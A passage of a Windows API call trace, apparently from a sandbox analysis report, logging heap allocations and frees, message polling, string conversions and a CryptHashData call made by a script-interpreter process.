Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.808] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0233.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0233.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0233.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ff8 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0233.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0233.812] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0233.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0233.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0233.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0233.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0233.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0233.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0233.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51538 [0233.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51538, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0233.815] CryptHashData (hHash=0xa87250, pbData=0x2e54fc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0233.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0233.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.817] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0233.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.818] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0233.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0233.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0233.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 